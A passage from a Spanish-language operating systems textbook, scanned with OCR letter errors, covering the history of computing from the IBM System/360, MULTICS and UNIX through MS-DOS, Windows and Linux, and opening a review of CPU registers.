de IBM para la 7094. 

1.2.3 La tercera generación (1965 a 1980): circuitos integrados 
y multiprogramación 

A principio de la década de 1960, la mayoría de los fabricantes de computadoras tenían dos líneas 
de productos distintas e incompatibles. Por una parte estaban las computadoras científicas a gran 
escala orientadas a palabras, como la 7094, que se utilizaban para cálculos numéricos en ciencia e 
ingeniería. Por otro lado, estaban las computadoras comerciales orientadas a caracteres, como la 
1401, que se utilizaban ampliamente para ordenar cintas e imprimir datos en los bancos y las com¬ 
pañías de seguros. 

Desarrollar y dar mantenimiento a dos líneas de productos completamente distintos era una 
propuesta costosa para los fabricantes. Además, muchos nuevos clientes de computadoras necesita¬ 
ban al principio un equipo pequeño, pero más adelante ya no era suficiente y deseaban una máqui¬ 
na más grande que pudiera ejecutar todos sus programas anteriores, pero con mayor rapidez. 
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IBM intentó resolver ambos problemas de un solo golpe con la introducción déla línea de compu¬ 
tadoras System/360. La 360 era una serie de máquinas compatibles con el software, que variaban 
desde un tamaño similar a la 1401 hasta algunas que eran más potentes que la 7094. Las máquinas 
sólo diferían en el precio y rendimiento (máxima memoria, velocidad del procesador, número de 
dispositivos de E/S permitidos, etcétera). Como todas las máquinas tenían la misma arquitectura y 
el mismo conjunto de instrucciones, los programas escritos para una máquina podían ejecutarse en 
todas las demás, por lo menos en teoría. Lo que es más, la 360 se diseñó para manejar tanto la compu¬ 
tación científica (es decir, numérica) como comercial. Por ende, una sola familia de máquinas po¬ 
día satisfacer las necesidades de todos los clientes. En los años siguientes, mediante el uso de 
tecnología más moderna, IBM ha desarrollado sucesores compatibles con la línea 360, a los cuales 
se les conoce como modelos 370, 4300, 3080 y 3090. La serie zSeries es el descendiente más re¬ 
ciente de esta línea, aunque diverge considerablemente del original. 

La IBM 360 fue la primera línea importante de computadoras en utilizar circuitos integrados 
(ICs) (a pequeña escala), con lo cual se pudo ofrecer una mayor ventaja de precio/rendimiento en 
comparación con las máquinas de segunda generación, las cuales fueron construidas a partir de tran¬ 
sistores individuales. Su éxito fue inmediato y la idea de una familia de computadoras compatibles 
pronto fue adoptada por todos los demás fabricantes importantes. L os descendientes de estas máqui¬ 
nas se siguen utilizando hoy día en centros de cómputo. En la actualidad se utilizan con frecuencia 
para manejar bases de datos enormes (por ejemplo, para sistemas de reservaciones de aerolíneas) 
o como servidores para sitios de World Wide Web que deben procesar miles de solicitudes por se¬ 
gundo. 

La mayor fortaleza de la idea de "una sola familia" fue al mismo tiempo su mayor debilidad. 
La intención era que todo el software, incluyendo al sistema operativo OS/360, funcionara en to¬ 
dos los modelos. Debía ejecutarse en los sistemas pequeños, que por lo general sólo reemplazaban 
a la 1401s, que copiaba tarjetas a cinta, y en los sistemas muy grandes, que a menudo reemplazaban a 
la 7094s, que realizaba predicciones del clima y otros cálculos pesados. Tenía que ser bueno en sis¬ 
temas con pocos dispositivos periféricos y en sistemas con muchos. Tenía que funcionar en ambos 
entornos comerciales y científicos. Por encima de todo, tenía que ser eficiente para todos estos usos 
distintos. 

N o había forma en que IB M (o cualquier otra) pudiera escribir una pieza de software que cum¬ 
pliera con todos estos requerimientos en conflicto. El resultado fue un enormey extraordinariamen¬ 
te complejo sistema operativo, tal vez de dos a tres órdenes de magnitud más grande que el FM S. 
Consistía en millones de líneas de lenguaje ensamblador escrito por miles de programadores, con 
miles de errores, los cuales requerían un flujo continuo de nuevas versiones en un intento por co¬ 
rregirlos. Cada nueva versión corregía algunos errores e introducía otros, por lo que probablemen¬ 
te el número de errores permanecía constante en el tiempo. 

Fred Brooks, uno de los diseñadores del OS/360, escribió posteriormente un libro ingenioso e 
incisivo (Brooks, 1996) que describía sus experiencias con el OS/360. Aunque sería imposible re¬ 
sumir este libro aquí, basta con decir que la portada muestra una manada de bestias prehistóricas 
atrapadas en un pozo de brea. La portada de Silberschatz y coautores (2005) muestra un punto de 
vista similar acerca de que los sistemas operativos son como dinosaurios. 

A pesar de su enorme tamaño y sus problemas, el OS/360 y los sistemas operativos similares 
de tercera generación producidos por otros fabricantes de computadoras en realidad dejaban razo- 
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nablemente satisfechos a la mayoría de sus clientes. También popularizaron varias técnicas clave 
ausentes en los sistemas operativos de segunda generación. Ouizá la más importante de éstas fue la 
multiprogramación. En la 7094, cuando el trabajo actual se detenía para esperar a que se comple¬ 
tara una operación con cinta u otro dispositivo de E/S, la CPU simplemente permanecía inactiva 
hasta terminar la operación de E/S. Con los cálculos científicos que requieren un uso intensivo de 
la CPU, la E/S no es frecuente, por lo que este tiempo desperdiciado no es considerable. Con el pro¬ 
cesamiento de datos comerciales, el tiempo de espera de las operaciones de E/S puede ser a menu¬ 
do de 80 a 90 por ciento del tiempo total, por lo que debía hacerse algo para evitar que la (costosa) 
CPU esté inactiva por mucho tiempo. 

La solución que surgió fue particionar la memoria en varias piezas, con un trabajo distinto en 
cada partición, como se muestra en la figura 1-5. M ientras que un trabajo esperaba a que se com¬ 
pletara una operación de E/S, otro podía estar usando la CPU. Si pudieran contenerse suficientes 
trabajos en memoria principal al mismo tiempo, la CPU podía estar ocupada casi 100 por ciento del 
tiempo. Para tener varios trabajos de forma segura en memoria a la vez, se requiere hardware espe¬ 
cial para proteger cada trabajo y evitar que los otros se entrometan y lo malogren; el 360 y los de¬ 
más sistemas de tercera generación estaban equipados con este hardware. 


Trabajo 3 


Trabajo 2 


Trabajo 1 


Sistema 

operativo 


Particiones 
de memoria 


Figura 1-5. U n sistema de multiprogramación con tres trabajos en memoria. 

Otra característica importante de los sistemas operativos de tercera generación fue la capacidad 
para leer trabajos en tarjetas y colocarlos en el disco tan pronto como se llevaban al cuarto de compu¬ 
tadoras. A sí, cada vez que terminaba un trabajo en ejecución, el sistema operativo podía cargar un nue¬ 
vo trabajo del disco en la partición que entonces estaba vacía y lo ejecutaba. A esta técnica se le conoce 
como spooling (de Simultaneóos Peripheral Operation On Line, operación periférica simultánea en 
línea) y también se utilizó para las operaciones de salida. Con el spooling, las máquinas 1401 no eran 
ya necesarias y desapareció la mayor parte del trabajo de transportar las cintas. 

Aunque los sistemas operativos de tercera generación eran apropiados para los cálculos cientí¬ 
ficos extensos y las ejecuciones de procesamiento de datos comerciales masivos, seguían siendo en 
esencia sistemas de procesamiento por lotes. M uchos programadores añoraban los días de la prime¬ 
ra generación en los que tenían toda la máquina para ellos durante unas cuantas horas, por lo que po¬ 
dían depurar sus programas con rapidez. Con los sistemas de tercera generación, el tiempo que 
transcurría entre enviar un trabajo y recibir de vuelta la salida era comúnmente de varias horas, por 
lo que una sola coma mal colocada podía ocasionar quefallara la compilación, y el programador des¬ 
perdiciara la mitad del día. 

Este deseo de obtener un tiempo rápido de respuesta allanó el camino para el tiempo compar¬ 
tido (timesharing), una variante de la multiprogramación donde cada usuario tenía una terminal en 
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línea. En un sistema de tiempo compartido, si 20 usuarios están conectados y 17 de ei i os están pen¬ 
sando en dar un paseo o tomar café, ia CPU se puede asignar por turno a ios tres trabajos que de¬ 
sean ser atendidos. Como ias personas que depuran programas generaimente envían comandos 
cortos (por ejempio, compiiar un procedimiento de cinco hojasi") en vez de iargos (por ejempio, or¬ 
denar un archivo con un miiión de registros), ia computadora puede proporcionar un servicio rápi¬ 
do e interactivo a varios usuarios y, tai vez, también ocuparse en trabajos grandes por iotes en 
segundo piano, cuando ia CPU estaría inactiva de otra manera. Ei primer sistema de tiempo com¬ 
partido de propósito generai, conocido como CTSS (Compatibie Time Sharing System, Sistema 
compatibie de tiempo compartido), se desarroiió en ei M .I.T. en una 7094 modificada en forma 
especiai (Corbató y coiaboradores, 1962). Sin embargo, en reaiidad ei tiempo compartido no se po- 
puiarizó sino hasta que ei hardware de protección necesario se empezó a utiiizar ampiiamente du¬ 
rante i a tercera generación. 

Después dei éxito dei sistema CTSS, ei M .I.T., Beii Labs y Generai Eiectric (que en ese enton¬ 
ces era un importante fabricante de computadoras) decidieron emprender ei desarroiio de una "uti- 
iería para computadora", una máquina capaz de servir a varios cientos de usuarios simuitáneos de 
tiempo compartido. Su modeio fue ei sistema de eiectricidad: cuando se necesita energía, sóio hay 
que conectar un contacto a ia pared y, dentro de io razonabie, toda ia energía que se requiera esta¬ 
rá ahí. Los diseñadores dei sistema conocido como MULTICS (MULTipiexed Information and 
Computing Service: Servicio de Información y Cómputo M ULTipiexado), imaginaron una enor¬ 
me máquina que proporcionaba poder de cómputo a todos ios usuarios en ei área de Boston. La idea 
de que, sóio 40 años después, se vendieran por miñones máquinas 10,000 veces más rápidas que su 
mainframe GE-645 (a un precio muy por debajo de ios 1000 dóiares) era pura ciencia ficción. Ai- 
go así como ia idea de que en estos días existiera un transadántico supersónico por debajo dei agua. 

M U LTICS fue un éxito parciai. Se diseñó para dar soporte a cientos de usuarios en una máqui¬ 
na que era sóio un poco más potente que una PC basada en ei Intei 386, aunque tenía mucho más 
capacidad de E/S. Esto no es tan disparatado como parece, ya que ias personas sabían cómo escri¬ 
bir programas pequeños y eficientes en esos días, una habiiidad que se ha perdido con ei tiempo. 
Hubo muchas razones por ias que M ULTICS no acaparó la atención mundial; una de ellas fue el 
que estaba escrito en PL/I y el compilador de PL/I se demoró por años, además de que apenas fun¬ 
cionaba cuando por fin llegó. Aparte de eso, MULTICS era un sistema demasiado ambicioso para 
su época, algo muy parecido a la máquina analítica de Charles Babbage en el siglo diecinueve. 

Para resumir esta larga historia, M U LTICS introdujo muchas ideas seminales en la literatura de 
las computadoras, pero convertirlas en un producto serio y con éxito comercial importante era algo 
mucho más difícil de lo que cualquiera hubiera esperado. Bell Labs se retiró del proyecto y Gene¬ 
ral Electric dejó el negocio de las computadoras por completo. Sin embargo, el M .I.T. persistió y 
logró hacer en un momento dado que M ULTICS funcionara. Al final, la compañía que compró el 
negocio de computadoras de GE (HoneyweII) lo vendió como un producto comercial y fue instala¬ 
do por cerca de 80 compañías y universidades importantes a nivel mundial. Aunque en número pe¬ 
queño, los usuarios de MU LTICS eran muy leales. Por ejemplo. General Motors, Fordy laAgencia 
de Seguridad Nacional de los Estados Unidos desconectaron sus sistemas MULTICS sólo hasta 


t En este libro utilizaremos los términos "procedimiento”, "subrutina" y "función" de manera indistinta. 
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finales de la década de 1990, 30 años después de su presentación en el mercado y de tratar durante 
años de hacer que HoneyweII actualizara el hardware. 

Por ahora, el concepto de una "utilería para computadora" se ha disipado, pero tal vez regrese 
en forma de servidores masivos de Internet centralizados a los que se conecten máquinas de usua¬ 
rio relativamente "tontas", donde la mayoría del trabajo se realice en los servidores grandes. Es pro¬ 
bable que la motivación en este caso sea que la mayoría de las personas no desean administrar un 
sistema de cómputo cada vez más complejo y melindroso, y prefieren delegar esa tarea a un equi¬ 
po de profesionales que trabajen para la compañía que opera el servidor. El comercio electrónico ya 
está evolucionando en esta dirección, en donde varias compañías operan centros comerciales elec¬ 
trónicos en servidores multi procesador a los que se conectan las máquinas el i ente simples, algo muy 
parecido al diseño de M ULTICS. 

A pesar de la carencia de éxito comercial, M ULTICS tuvo una enorme influencia en los siste¬ 
mas operativos subsecuentes. Se describe en varios artículos y en un libro (Corbató y colaboradores, 
1972; Corbató y Vyssotsky, 1965; Daley y Dennis, 1968; Organick, 1972; y Staitzer, 1974). También 
tuvo (y aún tiene) un sitio Web activo, ubicado en www.multicians.org, con mucha información acer¬ 
ca del sistema, sus diseñadores y sus usuarios. 

Otro desarrollo importante durante la tercera generación fue el increíble crecimiento de las mi¬ 
nicomputadoras, empezando con la DEC PDP-1 en 1961. La PDP-1 tenía sólo 4K de palabras de 
18 bits, pero a $120,000 por máquina (menos de 5 por ciento del precio de una 7094) se vendió co¬ 
mo pan caliente. Para cierta clase de trabajo no numérico, era casi tan rápida como la 7094 y dio 
origen a una nueva industria. A esta minicomputadora le siguió rápidamente una serie de otras PDP 
(a diferencia de la familia de IBM, todas eran incompatibles), culminando con la PDP-11. 

Posteriormente, Ken Thompson, uno de los científicos de cómputo en Bell Labs que trabajó en 
el proyecto M ULTICS, encontró una pequeña minicomputadora PDP-7 que nadie estaba usando y 
se dispuso a escribir una versión simple de M ULTICS para un solo usuario. M ás adelante, este tra¬ 
bajo se convirtió en el sistema operativo UNIX®, que se hizo popular en el mundo académico, las 
agencias gubernamentales y muchas compañías. 

La historia de UNIX ya ha sido contada en muchos otros libros (por ejemplo, Salus, 1994). En 
el capítulo 10 hablaremos sobre parte de esa historia. Por ahora baste con decir que, debido a que el 
código fuente estaba disponible ampliamente, varias organizaciones desarrollaron sus propias 
versiones (incompatibles entre sí), lo cual produjo un caos. Se desarrollaron dos versiones princi¬ 
pales: System V de AT&T y BSD (Berkeley Software Distribution, Distribución de Software de 
Berkeley) de la Universidad de California en Berkeley. Estas versiones tenían también variantes 
menores. Para que fuera posible escribir programas que pudieran ejecutarse en cualquier sistema 
UNIX, el IEEE desarrolló un estándar para UNIX conocido como POSIX, con el que la mayoría 
de las versiones de UNIX actuales cumplen. POSIX define una interfaz mínima de llamadas al sis¬ 
tema a la que los sistemas UNIX deben conformarse. De hecho, algunos de los otros sistemas ope¬ 
rativos también admiten ahora la interfaz POSIX. 

Como agregado, vale la pena mencionar que en 1987 el autor liberó un pequeño clon de UNIX 
conocido como MINIX, con fines educativos. En cuanto a su funcionalidad, M INIX es muy simi¬ 
lar a UNIX, incluyendo el soporte para POSIX. Desde esa época, la versión original ha evolucio¬ 
nado en M INIX 3, que es altamente modular y está enfocada a presentar una muy alta confiabilidad. 
Tiene la habilidad de detectar y reemplazar módulos con fallas o incluso inutilizables (como los dis- 
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positivos controiadores de dispositivos de E/S) ai instante, sin necesidad de reiniciar y sin pertur¬ 
bar a ios programas en ejecución. También hay disponibie un iibro que describe su operación inter¬ 
na y contiene un iistado dei código fuente en un apéndice (Tanenbaum y Woodhuii, 2006). Ei 
sistema MINIX 3 está disponibie en forma gratuita (inciuyendo todo ei código fuente) a través de 
Internet, en www.minix3.org. 

Ei deseo de una versión de producción (en vez de educativa) gratuita de M INIX llevó a un es¬ 
tudiante finlandés, llamado LinusTorvalds, a escribir Linux. Este sistema estaba inspirado por M I- 
NIX, además de que fue desarrollado en este sistema y originalmente ofrecía soporte para varias 
características de M INIX (por ejemplo, el sistema de archivos de M INIX). Desde entonces se ha 
extendido en muchas formas, pero todavía retiene cierta parte de su estructura subyacente común 
para MINIX yUNIX.Los lectores interesados en una historia detallada sobre Linux y el movimien¬ 
to de código fuente abierto tal vez deseen leer el libro de Glyn Moody (2001). La 
mayor parte de lo que se haya dicho acerca de UNIX en este libro se aplica también a System V, 
MINIX, Linux y otras versiones y clones de UNIX. 


1.2.4 La cuarta generación (1980 a la fecha): 
las computadoras personales 

Con el desarrollo de los circuitos LSI (Large Scale Integration, Integración a gran escala), que 
contienen miles de transistores en un centímetro cuadrado de silicio (chip), nació la era de la 
computadora personal. En términos de arquitectura, las computadoras personales (que al princi¬ 
pio eran conocidas como microcomputadoras) no eran del todo distintas de las minicomputado¬ 
ras de la clase PDP-11, pero en términos de precio sin duda eran distintas. Mientras que la 
minicomputadora hizo posible que un departamento en una compañía o universidad tuviera su 
propia computadora, el chip microprocesador logró que un individuo tuviera su propia compu¬ 
tadora personal. 

Cuando Intel presentó el microprocesador 8080 en 1974 (la primera CPU de 8 bits de propó¬ 
sito general), deseaba un sistema operativo, en parte para poder probarlo. Intel pidió a uno de sus 
consultores, Gary Kildall, que escribiera uno. Kildall y un amigo construyeron primero un dispo¬ 
sitivo controlador para el disco flexible de 8 pulgadas de Shugart Associates que recién había si¬ 
do sacado al mercado, y conectaron el disco flexible con el 8080, con lo cual produjeron la primera 
microcomputadora con un disco. Después Kildall escribió un sistema operativo basado en disco 
conocido como CP/M (Control Program for Microcomputers; Programa de Control para 
M icrocomputadoras) para esta CPU. Como Intel no pensó que las microcomputadoras basadas en 
disco tuvieran mucho futuro, cuando Kildall pidió los derechos para CP/M , Intel le concedió su 
petición. Después K ildall formó una compañía llamada Digital Research para desarrollar y vender 
el CP/M. 

En 1977, Digital Research rediseñó el CP/M para adaptarlo de manera que se pudiera ejecutar 
en todas las microcomputadoras que utilizaban los chips 8080, Zilog Z80 y otros. Se escribieron 
muchos programas de aplicación para ejecutarse en CP/M , lo cual le permitió dominar por comple¬ 
to el mundo de la microcomputación durante un tiempo aproximado de 5 años. 
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A principios de ia década de 1980, IBM diseñó ia IBM PC y buscó software para ejecutarlo en 
ella. La gente de IBM se puso en contacto con Bill Gates para obtener una licencia de uso de su in¬ 
térprete de BASIC. También le preguntaron si sabía de un sistema operativo que se ejecutara en la 
PC. Gates sugirió a IBM que se pusiera en contacto con Digital Research, que en ese entonces era 
la compañía con dominio mundial en el área de sistemas operativos. Kildall rehusó a reunirse con 
IBM y envió a uno de sus subordinados, a lo cual se le considera sin duda la peor decisión de ne¬ 
gocios de la historia. Para empeorar más aún las cosas, su abogado se rehusó a firmar el contrato 
de no divulgación de IBM sobre la PC, que no se había anunciado todavía. IBM regresó con Gates 
para ver si podía proveerles un sistema operativo. 

Cuando IBM regresó, Gates se había enterado de que un fabricante local de computadoras, 
Seattie Computer Products, tenía un sistema operativo adecuado conocido como DOS (D isk Ope- 
rating System; Sistema Operativo en Disco). Se acercó a ellos y les ofreció comprarlo (supues¬ 
tamente por 75,000 dólares), a lo cual ellos accedieron de buena manera. Después Gates ofreció 
a IBM un paquete con DOS/BASIC, el cual aceptó. IBM quería ciertas modificaciones, por lo 
que Gates contrató a la persona que escribió el DOS, Tim Paterson, como empleado de su recién 
creada empresa de nombre M icrosoft, para que las llevara a cabo. El sistema rediseñado cambió 
su nombre a MS-DOS (M icrosoft D isk Operating System; Sistema Operativo en Disco de M icro- 
Soft) y rápidamente llegó a dominar el mercado de la IBM PC. Un factor clave aquí fue la deci¬ 
sión de Gates (que en retrospectiva, fue en extremo inteligente) de vender MS-DOS a las 
empresas de computadoras para que lo incluyeran con su hardware, en comparación con el inten¬ 
to de Kildall por vender CP/M a los usuarios finales, uno a la vez (por lo menos al principio). 
Después de que se supo todo esto, K ildall murió en forma repentina e inesperada debido a cau¬ 
sas que aún no han sido reveladas por completo. 

Para cuando salió al mercado en 1983 la IBM PC/AT, sucesora de la IBM PC, con la CPU Intel 
80286, M S-DOS estaba muy afianzado y CP/M daba sus últimos suspiros. M ás adelante, M S-DOS 
se utilizó ampliamente en el 80386 y 80486. Aunque la versión inicial de MS-DOS era bastante 
primitiva, las versiones siguientes tenían características más avanzadas, incluyendo muchas que 
se tomaron de UNIX. (M icrosoft estaba muy al tanto de UNIX e inclusive vendía una versión de 
este sistema para microcomputadora, conocida como XENIX, durante los primeros años de la com¬ 
pañía). 

CP/M , M S-DOS y otros sistemas operativos para las primeras microcomputadoras se basaban 
en que los usuarios escribieran los comandos mediante el teclado. Con el tiempo esto cambió debi¬ 
do a la investigación realizada por Doug Engelbart en el Stanford Research Institute en la década 
de 1960. Engelbart inventó la Interfaz Gráfica de Usuario GUI, completa con ventanas, iconos, 
menúsy ratón. Los investigadores en Xerox PARC adoptaron estas ideas y las incorporaron en las 
máquinas que construyeron. 

Un día, Stevejobs, que fue co-inventor de la computadora Apple en su cochera, visitó PARC, 
vio una GUI y de inmediato se dio cuenta de su valor potencial, algo que la administración de Xe¬ 
rox no hizo. Esta equivocación estratégica de gigantescas proporciones condujo a un libro titulado 
Fumbling the Future (Smith y Alexander, 1988). Posteriormente, Jobs emprendió el proyecto de 
construir una Apple con una GUI. Este proyecto culminó en Lisa, que era demasiado costosa y fra¬ 
casó comercial mente. El segundo intento de Jobs, la Apple M acintosh, fue un enorme éxito, no só¬ 
lo debido a que era mucho más económica que Lisa, sino también porque era amigable para el 
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usuario (user friendiy), lo cual significaba que estaba diseñada para ios usuarios que no sóio no sa¬ 
bían nada acerca de ias computadoras, sino que además no tenían ninguna intención de aprender. 
En ei mundo creativo dei diseño gráfico, ia fotografía digitai profesionai y ia producción de video 
digitai profesionai, ias M acintosh son ampiiamente utiiizadas y sus usuarios son muy entusiastas 
sobre eiias. 

Cuando M icrosoft decidió crear un sucesor para ei M S-DOS estaba fuertemente infiuenciado 
por ei éxito de ia M acintosh. Produjo un sistema basado en GUI llamado Windows, el cual en un 
principio se ejecutaba encima del M S-DOS (es decir, era más como un shell que un verdadero sis¬ 
tema operativo). Durante cerca de 10 años, de 1985 a 1995, Windows fue sólo un entorno gráfico 
encima de M S-DOS. Sin embargo, a partir de 1995 se liberó una versión independiente de Win¬ 
dows, conocida como Windows 95, que incorporaba muchas características de los sistemas opera¬ 
tivos y utilizaba el sistema M S-DOS subyacente sólo para iniciar y ejecutar programas de M S-DOS 
antiguos. En 1998, se liberó una versión ligeramente modificada de este sistema, conocida como 
Windows 98. Sin embargo, tanto Windows 95 como Windows 98 aún contenían una gran cantidad 
de lenguaje ensamblador para los procesadores Intel de 16 bits. 

Otro de los sistemas operativos de M icrosoft es Windows NT (NT significa Nueva Tecnolo¬ 
gía), que es compatible con Windows 95 en cierto nivel, pero fue completamente rediseñado en su 
interior. Es un sistema completo de 32 bits. El diseñador en jefe de Windows NT fue David Cutler, 
quien también fue uno de los diseñadores del sistema operativo VM S de VAX, por lo que hay al¬ 
gunas ideas de V M S presentes en NT. De hecho, había tantas ideas de V M S presentes que el pro¬ 
pietario de VM S (DEC) demandó a M icrosoft. El caso se resolvió en la corte por una cantidad de 
muchos dígitos. M icrosoft esperaba que la primera versión de NT acabara con M S-DOS y todas las 
demás versiones de Windows, ya que era un sistema muy superior, pero fracasó. No fue sino hasta 
Windows NT 4.0 que final mente empezó a tener éxito, en especial en las redes corporativas. La ver¬ 
sión 5 de Windows NT cambió su nombre a Windows 2000 a principios de 1999. Estaba destinada 
a ser el sucesor de Windows 98 y de Windows NT 4.0. 

Esto tampoco funcionó como se esperaba, por lo que M icrosoft preparó otra versión de Win¬ 
dows 98 conocida como Windows Me (M illennium edition). En el 2001 se liberó una versión lige¬ 
ramente actualizada de Windows 2000, conocida como Windows X P. Esa versión duró mucho más 
en el mercado (6 años), reemplazando a casi todas las versiones anteriores de Windows. Después, 
en enero del 2007 M icrosoft liberó el sucesor para Windows XP, conocido como Windows Vista. 
Tenía una interfaz gráfica nueva. Aero, y muchos programas de usuario nuevos o actualizados. M i- 
crosoft espera que sustituya a Windows X P por completo, pero este proceso podría durar casi toda 
una década. 

El otro competidor importante en el mundo de las computadoras personales es UNIX (y to¬ 
das sus variantes). UNIX es más fuerte en los servidores tanto de redes como empresariales, pe¬ 
ro también está cada vez más presente en las computadoras de escritorio, en especial en los países 
que se desarrollan con rapidez, como India y China. En las computadoras basadas en Pentium, 
Linux se está convirtiendo en una alternativa popular para Windows entre los estudiantes y cada 
vez más usuarios corporativos. Como agregado, a lo largo de este libro utilizaremos el término 
"Pentium" para denotar al Pentium I, II, III y 4, así como sus sucesores tales como el Core2 Dúo. 
El término x86 también se utiliza algunas veces para indicar el rango completo de CPU Intel par¬ 
tiendo desde el 8086, mientras que utilizaremos "Pentium" para indicar todas las CPU desde el 
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Pentium I .Admitimos que este término no es perfecto, pero no hay disponibie uno mejor. Uno se 
pregunta qué genio de mercadotecnia en Intei desperdició una marca comerciai (Pentium) que 
ia mitad dei mundo conocía bien y respetaba, sustituyéndoia con términos como "Core 2 dúo" 
que muy pocas personas comprenden; ¿qué significan "2" y "dúo"? Tai vez "Pentium 5" (o "Pen¬ 
tium 5 duai core", etc.) eran demasiado difíciies de recordar. FreeBSD es también un derivado 
popuiardeUNIX, que se originó dei proyectoBSD en Berkeiey. Todas i a computadoras modernas 
M acintosh utiiizan una versión modificada de FreeBSD. UNIX también es estándar en ias estacio¬ 
nes de trabajo operadas por chips RISC de alto rendimiento, como los que venden H ewlett-Packard 
y Sun M icrosystems. 

M uchos usuarios de UNIX, en especial los programadores experimentados, prefieren una in¬ 
terfaz de línea de comandos a una GUI, por lo que casi todos los sistemas UNIX presentan un sis¬ 
tema de ventanas llamado X Window System (también conocido como Xll), producido en el 
M .l.T. Este sistema se encarga de la administración básica de las ventanas y permite a los usuarios 
crear, eliminar, desplazar y cambiar el tamaño de las ventanas mediante el uso de un ratón. Con fre¬ 
cuencia hay disponible una GUI completa, como Gnomeo KDE, para ejecutarse encima de X 11, 
lo cual proporciona a UNIX una apariencia parecida a la Macintosh o a MicrosoftWindows, para 
aquellos usuarios de U NIX que desean algo así. 

Un interesante desarrollo que empezó a surgirá mediados de la década de 1980 es el crecimien¬ 
to de las redes de computadoras personales que ejecutan sistemas operativos en red y sistemas 
operativos distribuidos (Tanenbaum y Van Steen, 2007). En un sistema operativo en red, los usua¬ 
rios están conscientes de la existencia de varias computadoras, y pueden iniciar sesión en equipos 
remotos y copiar archivos de un equipo a otro. Cada equipo ejecuta su propio sistema operativo lo¬ 
cal y tiene su propio usuario (o usuarios) local. 

Los sistemas operativos en red no son fundamentalmente distintos de los sistemas operativos 
con un solo procesador. Es obvio que necesitan un dispositivo controlador de interfaz de red y cier¬ 
to software de bajo nivel para controlarlo, así como programas para lograr el inicio de una sesión 
remota y el acceso remoto a los archivos, pero estas adiciones no cambian la estructura esencial del 
sistema operativo. 

En contraste, un sistema operativo distribuido se presenta a sus usuarios en forma de un sis¬ 
tema tradicional con un procesador, aun cuando en realidad está compuesto de varios procesado¬ 
res. Los usuarios no tienen que saber en dónde se están ejecutando sus programas o en dónde se 
encuentran sus archivos: el sistema operativo se encarga de todo esto de manera automática y efi¬ 
ciente. 

Los verdaderos sistemas operativos distribuidos requieren algo más que sólo agregar un poco 
de código a un sistema operativo con un solo procesador, ya que los sistemas distribuidos y los cen¬ 
tral izados difieren en varios puntos críticos. Por ejemplo, los sistemas distribuidos permiten con fre¬ 
cuencia que las aplicaciones se ejecuten en varios procesadores al mismo tiempo, lo que requiere 
algoritmos de planificación del procesador más complejos para poder optimizar la cantidad de pa¬ 
ralelismo. 

Los retrasos de comunicación dentro de la red implican a menudo que estos (y otros) algorit¬ 
mos deban ejecutarse con información incompleta, obsoleta o incluso incorrecta. Esta situación es 
muy distinta a la de un sistema con un solo procesador, donde el sistema operativo tiene informa¬ 
ción completa acerca del estado del sistema. 
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1.3 REVISIÓN DEL HARDWARE DE COMPUTADORA 

U n sistema operativo está íntimamente reiacionado con ei hardware de ia computadora sobre ia que 
se ejecuta. Extiende ei conjunto de instrucciones de ia computadora y administra sus recursos. Para 
trabajar debe conocer muy bien ei hardware, por io menos en io que respecta a cómo aparece para ei 
programador. Por esta razón, revisaremos brevemente ei hardware de computadora como se encuen¬ 
tra en i as computadoras personaies modernas. Después de eso, podemos empezar a entrar en ios de- 
taiies acerca de qué hacen ios sistemas operativos y cómo funcionan. 

Conceptuaimente, una computadora personai simpie se puede abstraer mediante un modeio co¬ 
mo ei de ia figura 1-6. La CPU, ia memoria y ios dispositivos de E/S están conectados mediante un 
bus dei sistema y se comunican entre sí a través de este bus. Las computadoras personaies moder¬ 
nas tienen una estructura más compiicada en ia que intervienen varios buses, ios cuaies anaiizare- 
mos más adeiante; por ahora basta con este modeio. En ias siguientes secciones anaiizaremos 
brevemente estos componentes y examinaremos aigunas de ias cuestiones de hardware que son de 
reievancia para ios diseñadores de sistemas operativos: sobra decir que será un resumen muy com¬ 
pacto. Se han escrito muchos iibros acerca dei tema dei hardware de computadora y su organiza¬ 
ción. Dos iibros muy conocidos acerca de este tema son ei deTanenbaum (2006) y ei de Patterson 
y Hennessy (2004). 


Monitor 



Bus 


Figura 1-6. Algunos de los componentes de una computadora personal simple. 


1.3.1 Procesadores 

El "cerebro" de la computadora es la CPU, que obtiene las instrucciones de la memoria y las eje¬ 
cuta. El ciclo básico de toda CPU es obtener la primera instrucción de memoria, decodificarla para 
determinar su tipo y operandos, ejecutarla y después obtener, decodificar y ejecutar las instruccio¬ 
nes subsiguientes. El ciclo se repite hasta que el programa termina. De esta forma se ejecutan los 
programas. 
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Cada CPU tiene un conjunto específico de instrucciones que puede ejecutar. Así, un Pentium 
no puede ejecutar programas de SPARC y un SPARC no puede ejecutar programas de Pentium. Co¬ 
mo ei acceso a ia memoria para obtener una instrucción o paiabra de datos requiere mucho más 
tiempo que ejecutar una instrucción, todas ias CPU contienen ciertos registros en su interior para 
contener ias variabies ciave y ios resuitados temporaies. Debido a esto, ei conjunto de instruccio¬ 
nes generaimente contiene instrucciones para cargar una paiabra de memoria en un registro y aima- 
cenar una paiabra de un registro en ia memoria. Otras instrucciones combinan dos operandos de ios 
registros, ia memoria o ambos en un soio resuitado, como ia operación de sumar dos paiabras y ai- 
macenar ei resuitado en un registro o ia memoria. 

Además de ios registros generaies utiiizados para contener variabies y resuitados temporaies, 
ia mayoría de ias computadoras tienen varios registros especiaies que están visibies para ei progra¬ 
mador. Uno deeiios es ei contador de programa (program counter), ei cuai contiene ia dirección 
de memoria de ia siguiente instrucción a obtener. Una vez que se obtiene esa instrucción, ei conta¬ 
dor de programa se actuaiiza para apuntar a ia siguiente. 

Otro registro es ei apuntador de pila (stack pointer), ei cuai apunta a ia parte superior de ia 
piia (stack) actuai en ia memoria. La piia contiene un conjunto de vaiores por cada procedimiento 
ai que se ha entrado pero dei que todavía no se ha saiido. Ei conjunto de vaiores en ia piia por pro¬ 
cedimiento contiene ios parámetros de entrada, ias variabies iocaies y ias variabies temporaies que 
no se mantienen en ios registros. 

Otro de ios registros es PSW (Program Status Word; Paiabra de estado dei programa). Este 
registro contiene ios bits de código de condición, que se asignan cada vez que se ejecutan ias ins¬ 
trucciones de comparación, ia prioridad de ia CPU, ei modo (usuario o kernei) y varios otros bits 
decontroi. Los programas de usuario pueden ieernormai mente todo ei PSW pero poriogenerai só- 
io pueden escribir en aigunos de sus campos. Ei PSW juega un papei importante en ias i i amadas ai 
sistema y en ias operaciones de E/S. 

Ei sistema operativo debe estar ai tanto de todos ios registros. Cuando ia CPU se muitipiexa en 
ei tiempo, ei sistema operativo detiene con frecuencia ei programa en ejecución para (re)iniciarotro. 
